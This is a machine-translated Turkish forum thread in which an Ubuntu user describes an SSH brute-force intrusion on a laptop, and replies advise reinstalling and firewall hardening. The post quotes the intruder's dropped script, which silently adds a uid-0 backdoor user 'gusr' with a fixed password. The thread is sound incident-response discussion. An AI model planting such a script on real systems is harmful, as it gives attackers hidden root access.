Dizüstü bilgisayarımdaki kötü amaçlı yazılımlarla nasıl başa çıkılır?

12

Ubuntu 13.10 dizüstü bilgisayarıma bir tür kötü amaçlı yazılım bulaştığından oldukça eminim.

Arada bir, bir süreç / lib / sshd (root'a ait) çalışıyor ve çok fazla cpu tüketiyorum. / Usr / sbin / sshd dosyasını çalıştıran sshd sunucusu değildir.

İkili dosya --wxrw-rwt izinlerine sahiptir ve / lib dizininde komut dosyaları oluşturur ve oluşturur. Yeni bir ad 13959730401387633604 olarak adlandırılır ve aşağıdakileri yapar

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

Gusr kullanıcısı kötü amaçlı yazılım tarafından bağımsız olarak oluşturuldu ve% 100 işlemci tüketirken chpasswd kilitleniyor.

Şimdiye kadar, gusr kullanıcısının ek olarak / etc /

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Kötü amaçlı yazılım "-" son eki ile tüm bu dosyaların kopyalarını yapmış gibi görünüyor. Kök tarafından değiştirilen / etc / dosyalarının tam listesi burada bulunabilir .

Buna ek olarak, / etc / hosts dosyasını değiştirildi bu .

/ Lib / sshd, kendisini /etc/init.d/rc.local dosyasının sonuna ekleyerek başlar!

Kullanıcıyı kaldırdım, dosyaları kaldırdım, işlenen ağacı öldürdüm, parolalarımı değiştirdim ve ssh genel anahtarlarını kaldırdım.

Temelde vidalandığımın farkındayım ve büyük olasılıkla tüm sistemi yeniden yükleyeceğim. Yine de, diğer birkaç makineye giriş yaptığım için, en azından onu kaldırmaya çalışmak ve nasıl aldığımı anlamak iyi olurdu. Bu konuda nasıl gideceğiniz konusunda herhangi bir öneriniz takdir edilecektir.

Görünüşe göre kaba kuvvet girişiyle 25 Mart'ta girdiler. Kök ssh Ubuntu varsayılan olarak etkin olduğunu bilmiyordum. Devre dışı bıraktım ve denyhosts koydum.

Giriş, görünüşte Hong Kong'un bir yerinde 59.188.247.236 idi.

EmperorLinux'dan dizüstü bilgisayar aldım ve root erişimi sağladılar. Bunlardan biri varsa ve sshd çalıştırıyorsanız dikkatli olun.

security  malware 
Dejan Jovanović
kaynak
2
Makinenizi ağdan KAPATIN! Şimdi!
Seth
2
Peki neden root girişi etkin? Bu , iyi bir sebep olmadan etkinleştirmemeniz gereken bir şey .
Seth
@Seth etkinleştirmedim, Ubuntu'da varsayılan olarak açıktı . Senin kadar şaşırdım.
Dejan Jovanović
1
Bkz. " Varsayılan olarak, SSH arka plan programı uzak kök oturum açma özelliği etkinleştirilmiş olarak gönderilir. Normalde Ubuntu kök kullanıcıya doğrudan erişime izin vermez, bu nedenle bu ayar önemsizdir. Kök hesabında bir parola ayarladıysanız, bu ayar potansiyel olabilir güvenlik riski ve devre dışı bırakılması gerekir. "
Seth
1
Bunun olmadığından oldukça eminim Linux/Ebury. Bu başka bir şey ve muhtemelen atanmış bir adı yok. Ebury yeni bir kullanıcı hesabı oluşturmaz ve sshd adlı yeni bir ikili dosyaya bırakılmadan openssh tarafından kullanılan paylaşılan kitaplığı değiştirirdi.
Mart'ta Riking

Yanıtlar:

11

İlk olarak, makineyi şimdi ağdan çıkarın!

İkincisi, neden root hesabını etkinleştirdiniz? Bunu yapmak için çok iyi bir nedeniniz yoksa, kök hesabı gerçekten etkinleştirmemelisiniz.

Üçüncü olarak, evet, temiz olduğunuzdan emin olmanın tek yolu temiz bir kurulum yapmaktır. Ayrıca yeni başlamanız ve yedeklemeye geri dönmemeniz önerilir, çünkü her şeyin ne zaman başladığını asla bilemezsiniz.

Bir sonraki kurulumunuzda bir güvenlik duvarı oluşturmanızı ve gelen tüm bağlantıları reddetmenizi de öneririm: 

sudo ufw default deny incoming

ve ssh ile izin ver: 

sudo ufw allow ssh

ve kök hesabı ETMEYİN! Kesinlikle kök ssh oturumunun devre dışı olduğundan emin olun.

Seth
kaynak
4
Kök hesabı kontrol ettim. Emperorlinux'dan dizüstü bilgisayar aldım ve hesabın kurulumunu sağladılar. Aptal.
Dejan Jovanović
1
@ DejanJovanović Bu korkunç!
Seth
Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.